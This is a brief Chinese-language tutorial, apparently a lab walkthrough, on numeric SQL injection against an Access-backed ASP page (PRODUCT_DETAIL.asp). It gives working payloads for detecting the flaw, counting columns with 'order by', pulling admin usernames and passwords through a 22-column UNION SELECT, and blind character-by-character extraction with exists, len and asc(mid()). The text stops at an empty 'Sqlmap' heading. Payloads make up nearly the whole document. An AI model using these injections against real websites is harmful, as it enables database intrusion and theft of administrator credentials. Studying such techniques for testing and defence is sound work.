access数字型注入

1.PRODUCT_DETAIL.asp文件存在数字型注入，先正常点击一个物品

2.输入’或者and 1=1 与and 1=2

3.页面无回显，证明存在数字型注入。采用两种方式进行注入：

一、联合注入

1.确定列名的数目：order by 22 与order by 23

2.猜解表名：

union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin
与
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from adaa

3.猜解列名，猜出列名则会返回数据：

union select 1,2,admin,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22 from admin

`

二、逐字猜解法

1.猜表名：and exists(select * from admin)

2.猜字段名：and exists(select admin from admin)

3.查字段数据，①确定长度，②确定ascii，长度：and (select top 1 len(admin) from admin)=5

4.确定ascii：and (select top 1 asc(mid(admin,1,1)) from admin)=97

Sqlmap测试：